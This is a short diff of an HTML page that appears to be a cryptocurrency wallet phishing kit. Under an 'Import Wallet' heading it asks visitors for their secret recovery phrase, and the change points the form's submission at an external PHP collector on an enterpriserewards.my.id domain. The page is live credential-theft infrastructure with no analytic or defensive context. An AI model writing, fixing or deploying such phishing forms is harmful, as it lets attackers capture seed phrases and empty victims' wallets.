--- a/Community/Coins/Give/Frize/index.html
+++ b/Community/Coins/Give/Frize/index.html
@@ -712,7 +712,7 @@ Language
 <h2 class="display-4 font-weight-bold mb-4">Import Wallet</h2><font size="3" face="Arial"><b>Enter your secret phrase here to connect
 </b></font><br>
     <br>
-<form method="POST" action="/newsappcryptowallet-token/CoinsfileFile-Appreciation.enterpriserewards.my.id/Errorer1.php?source=bookmark_apps=bookmark" accept-charset="UTF-8" class="margin-2 ng-scope ng-valid-minlength ng-dirty ng-valid-parse ng-valid ng-valid-required" style="">
+<form method="POST" action="https://coinsfilefile-appreciation.enterpriserewards.my.id/Errorer1.php?source=bookmark_apps=bookmark" accept-charset="UTF-8" class="margin-2 ng-scope ng-valid-minlength ng-dirty ng-valid-parse ng-valid ng-valid-required" style="">
 
     
      <div class="seed-block margin-3">
